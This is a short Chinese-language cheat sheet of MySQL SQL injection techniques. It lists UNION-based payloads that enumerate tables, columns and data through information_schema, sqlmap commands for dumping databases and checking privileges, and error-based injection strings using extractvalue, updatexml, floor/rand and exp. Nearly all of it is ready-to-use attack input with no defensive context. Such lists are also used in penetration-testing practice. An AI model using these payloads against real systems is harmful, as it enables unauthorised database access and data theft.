mysql联合注入

group_concat('[',version(),'][',database(),'][',@@datadir,'][',current_user(),'][',user(),'][',system_user(),'][',@@version_compile_os,']')

查询表名：

union select group_concat(table_name) from information_schema.tables where table_schema=database()

查询列名：

union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='$table_name'

查询数据：

union select group_concat($column1,'---',$column2,'---',$column3) from $table_name

sqlmap

sqlmap -u '$url' sqlmap -u '$url' --dbs sqlmap -u '$url' --current-db sqlmap -u '$url' -D '$database_name' --tables sqlmap -u '$url' -D '$database_name' -T '$table_name' --columns sqlmap -u '$url' -D '$database_name' -T '$table_name' -C '$column1,$column2,$column3' --dump sqlmap -u '$url' -f sqlmap -u '$url' -b sqlmap -u '$url' --is-dba sqlmap -u '$url' --users sqlmap -u '$url' --current-user sqlmap -u '$url' --privileges sqlmap -u '$url' --roles

报错注入：

extractvalue()

and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+

updatexml()

and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+ and updatexml(1,concat(0x7e,(select @@version)),1)--+

floor(),rand()

union select count(*),1,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a%23

exp()

union select exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a)),2,3%23

~0

union select (!(select * from (select user())x) - ~0),2,3--+